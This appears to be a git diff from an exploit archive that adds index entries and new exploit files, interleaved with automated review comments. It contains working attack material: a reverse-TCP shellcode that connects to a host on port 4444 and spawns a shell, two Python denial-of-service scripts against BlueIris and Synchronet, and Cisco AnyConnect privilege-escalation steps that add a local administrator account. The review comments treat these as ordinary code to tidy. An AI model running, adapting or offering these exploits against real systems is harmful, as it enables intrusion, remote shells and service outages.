diff --git a/files.csv b/files.csv
index 5338845f8..b363ee91b 100644
--- a/files.csv
+++ b/files.csv
@@ -5384,6 +5384,8 @@ id,file,description,date,author,platform,type,port
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8820,6 +8822,7 @@ id,file,description,date,author,platform,type,port
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
+41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15920,6 +15923,7 @@ id,file,description,date,author,platform,type,port
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37387,3 +37391,4 @@ id,file,description,date,author,platform,type,port
 41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
+41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
diff --git a/platforms/hardware/webapps/41472.html b/platforms/hardware/webapps/41472.html
new file mode 100755
index 000000000..c30fe2053
--- /dev/null
+++ b/platforms/hardware/webapps/41472.html
@@ -0,0 +1,26 @@ +# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334 +# Date: 2017-02-28 +# Exploit Author: SivertPL +# Vendor Homepage: http://netgear.com/ +# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip +# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!) +# Tested on: DGN2200v1,v2,v3,v4 + +# CVE: CVE-2017-6366 + +A quite dangerous CSRF was discovered on all DGN2200 firmwares. +When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website. + + + + netgear router CSRF + +
+ + + +
+ + + + \ No newline at end of file diff --git a/platforms/linux/shellcode/41477.c b/platforms/linux/shellcode/41477.c new file mode 100755 index 000000000..0e831f79a --- /dev/null +++ b/platforms/linux/shellcode/41477.c 
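Review bot: The `# Version:` header states 10.0.0.20 through 10.0.0.50 while the `# Software Link` on the line above names firmware 1.0.0.20, so one of the two is a typo and the header should be reconciled before the entry is indexed under that version range. The body of the file appears on this page only as bare `+` lines and the text `netgear router CSRF`, which looks like the HTML markup was stripped in rendering rather than absent from the commit; it is worth confirming that the committed file still holds whatever markup the description relies on. The hunk covers the whole new file, so nothing is cut off at the edges.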
@@ -0,0 +1,80 @@
+/*
+ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
+ Author: Manuel Mancera (@sinkmanu)
+ Tested on: 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
+GNU/Linux
+
+----------------- Assembly code -------------------
+
+section .text
+ global _start
+
+_start:
+ push 0x2d01a8c0 ; Address (192.168.1.45)
+ push word 0x5c11 ; Port (4444)
+ push word 2 ; Address family -
+AF_INET (0x2)
+ push 42 ; connect syscall
+ push byte 16 ; length
+ push byte 41 ; socket syscall
+ push byte 1 ; type - SOCK_STREAM (0x1)
+ push byte 2 ; family - AF_INET (0x2)
+
+ pop rdi ; family
+ pop rsi ; type
+ xor rdx, rdx ; protocol
+ pop rax ; socket syscall
+ syscall
+
+ mov rdi, rax ; sockfd
+ pop rdx ; length
+ pop rax ; connect syscall
+ mov rsi, rsp ; sockaddr
+ syscall
+
+ xor rsi, rsi
+loop:
+ mov al, 33
+ syscall
+ inc rsi
+ cmp rsi, 2
+ jle loop
+
+ xor rax, rax
+ mov rdi, 0x68732f6e69622f2f
+ xor rsi, rsi
+ push rsi
+ push rdi
+ mov rdi, rsp
+ xor rdx, rdx
+ mov al, 59
+ syscall
+
+
+---------------------------------------------------
+$ nasm -f elf64 reverse-tcp-shell.asm -o reverse-tcp-shell.o
+$ ld reverse-tcp-shell.o -o reverse-tcp-shell
+$ objdump -d ./reverse-tcp-shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$ ./shellcode
+Length: 84 bytes
+
+*/
+
+
+#include
+#include
+
+const char code[] = \
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main()
+{
+ printf("Length: %d bytes\n", strlen(code));
+ (*(void(*)()) code)();
+ return 0;
+}
+
diff --git a/platforms/windows/dos/41474.py b/platforms/windows/dos/41474.py
new file mode 100755
index 000000000..369590be5
--- /dev/null
+++ b/platforms/windows/dos/41474.py
@@ -0,0 +1,31 @@
+import socket
+
+
+# Title: BlueIris - Denial of Service
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://blueirissoftware.com/blueiris.exe
+# Version: 4.5.1.4
+# Tested on: Windows Server 2008 R2 Standard x64
+
+
+# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
+
+buffer = "A"*5000
+port = 21
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+
+print 'Listening on FTP port: '+str(port)
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 '+buffer+'\r\n')
+ conn.recv(1024)
+ conn.send('250 '+buffer+'\r\n')
+ conn.close()
+
diff --git a/platforms/windows/dos/41475.py b/platforms/windows/dos/41475.py
new file mode 100755
index 000000000..54cc6f1bb
--- /dev/null
+++ b/platforms/windows/dos/41475.py
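Review bot: `printf("Length: %d bytes\n", strlen(code));` in main() passes a `size_t` to a `%d` conversion, which is undefined behaviour under the C standard even though it usually prints the expected number on x86-64; the portable form is `printf("Length: %zu bytes\n", strlen(code));`. The two `#include` lines just before `const char code[]` appear here with no header names, which looks like angle-bracketed names were stripped in rendering rather than missing from the file, but it is worth confirming the committed file names `<stdio.h>` and `<string.h>`, since `printf` and `strlen` are otherwise undeclared. `int main()` would be tighter as `int main(void)` for a definition that takes no arguments. The hunk covers the whole file, so main() is complete within it.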
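Review bot: The `# Vendor Homepage: http://www.saptech-erp.com.au` header does not match the `# Software Link` for BlueIris on the following line, and the same homepage is repeated in platforms/windows/dos/41475.py against a synchro.net download, so the header looks copied from an earlier submission and should name the actual vendor site in both files. In the accept loop, `conn` is released only on the happy path: if `conn.recv(1024)` or either `conn.send` raises because the peer closed early, the exception leaves `while True` with both `conn` and the listening socket `s` still open. Wrapping the per-connection statements in `try: ... finally: conn.close()` releases the accepted socket regardless of how the exchange ends. The `print` statement is Python 2 syntax and the file carries no shebang or interpreter note, so the required interpreter version belongs in the header.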
@@ -0,0 +1,82 @@
+# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
+# Version: 3.16c for Windows
+# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
+# CVE : CVE-2017-6371
+
+import socket
+import time
+import sys
+
+try:
+ host = sys.argv[1]
+ port = 80
+except IndexError:
+ print "[+] Usage %s " % sys.argv[0]
+ sys.exit()
+
+
+exploit = "\x41"*4096
+
+buffer = "GET /index.ssjs HTTP/1.1\r\n"
+buffer+= "Host: 192.168.198.129\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: "+exploit+"\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down\r\n")
+ break
+
+
+print("[i] Waiting a few seconds before starting a second attack.\r\n")
+time.sleep(25)
+print("[*] Second run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ break
+
+print("[i] Wait before the final strike.\r\n")
+time.sleep(25)
+print("[*] Third run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ print("[!] It can take a few seconds for the service to crash\r\n")
+ break
+
diff --git a/platforms/windows/local/41476.txt b/platforms/windows/local/41476.txt
new file mode 100755
index 000000000..f3c00359c
--- /dev/null
+++ b/platforms/windows/local/41476.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
+# Date: 02/27/2017
+# Exploit Author: @Pcchillin
+# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
+# Version: 4.3.04027 and earlier
+# Tested on: Windows 10
+# CVE : CVE-2017-3813
+# Vendor ID : cisco-sa-20170208-anyconnect
+
+
+#Run CMD.EXE with system privileges
+1. Start Cisco anyconnect from logon screen.
+2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
+3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
+4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
+5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.
+
+
+#Run scripts from USB flash drive
+Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
+Example bat script:
+Net user #USERNAME #PASSWORD /add
+Net localgroup administrators #USERNAME /add
+
+
+#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
+#Twitter handle @pcchillin
\ No newline at end of file
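Review bot: Each of the three `while i < 957:` loops uses a bare `except:`, which also catches KeyboardInterrupt and SystemExit and reports every local failure (an unresolvable hostname, a refused connection, an argument typo) as "The service seems to be down"; narrowing it to `except socket.error:` keeps the message honest and lets Ctrl-C interrupt the script. The three loops are identical apart from the failure message and would be clearer as one helper taking the run label, called three times around the `time.sleep(25)` pauses. `connect=s.connect((host,port))` binds `None` and is never read, so the assignment can be dropped. The `Host:` header is fixed to 192.168.198.129 while the target comes from `sys.argv[1]`; if that is deliberate it deserves a comment, since a reader will otherwise take it for a leftover from the author's test setup.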